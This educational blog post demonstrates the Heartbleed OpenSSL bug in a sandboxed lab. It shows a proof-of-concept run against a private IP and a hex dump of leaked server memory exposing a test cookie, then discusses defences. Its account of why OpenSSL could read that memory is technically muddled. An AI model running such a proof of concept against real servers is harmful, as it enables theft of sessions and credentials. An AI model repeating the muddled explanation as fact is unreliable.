Heartbleed: Viewing Session Information
A major problem within the Heartbleed vulnerabilty is that an intruder can see the running memory of the Web server. As this memory often contains running data, such as session variables, passwords, encryption keys, and so on, it can reveal sensitive user information. In this sandboxed demo, we can see that the cookie information from the client can be seen within the running memory of the server:
From this we can see that the captured memory is:
billbuchanan@bills-mbp:~$ python heartbleed-poc.py 172.16.121.150 Scanning 172.16.121.150 on port 443 Connecting... Sending Client Hello... Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 937 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 Server TLS version was 1.2 Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384 Received heartbeat response: 0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C [email protected][...r... 0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9....... 0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....". 0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5. 0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................ 0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2. 0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../... 0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A............... 0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................ 0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4. 00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2............... 00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................ 00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................ 00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2E 38 0D 0A ....#........8.. 00e0: 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A Accept-Language: 00f0: 20 65 6E 2D 67 62 2C 65 6E 3B 71 3D 30 2E 35 0D en-gb,en;q=0.5. 0100: 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding 0110: 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate. 0120: 0A 43 6F 6F 6B 69 65 3A 20 74 65 73 74 63 6F 6F .Cookie: testcoo 0130: 6B 69 65 3D 68 65 6C 6C 6F 2B 62 69 6C 6C 0D 0A kie=hello+bill.. 0140: 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70 Connection: keep 0150: 2D 61 6C 69 76 65 0D 0A 0D 0A 5C A1 0F 0A E2 D8 -alive....\..... 0160: 66 30 62 A9 FC 99 A3 B7 A0 C4 00 00 00 00 00 00 f0b.............
Often a cookie is used to hold things like session ID and/or login credentials, thus an intruder can steal these, and log into the system.
How can we protect against this?
Well, it's actually quite difficult. The reason this has happened is that openssl is seen as a highly trusted program, so that it is allowed to actually read from sensistive areas of memory. This memory contains the program's data such as for it running variables, and can thus contains usernames, passwords, encryption keys, and so on. Thus if we trust the program so highly there is often very few checks that the operating system will make on how it operates. Other programs, such as for Microsoft .NET and Java, run within a completely sandboxed environment, and thus there are checks on what they can access - and which is known as managed code. Unfortunately a highly trusted component, especially one written in a low-level language such as C++, can gain access to sensitive areas that many other programs would not have the rights too. Thus the solution is really on the software development side, and it highlights the need to continually check programs for their operation, not only for normal data, but with extremely data input. Unfortunately many software developers do not spend enough time testing, and often they test their own code. So we need a whole new generation of people, who know how to write code, and also how to test it. These people are not likely to actually write the code, but they are the people who will understand it, and know how to review and test it.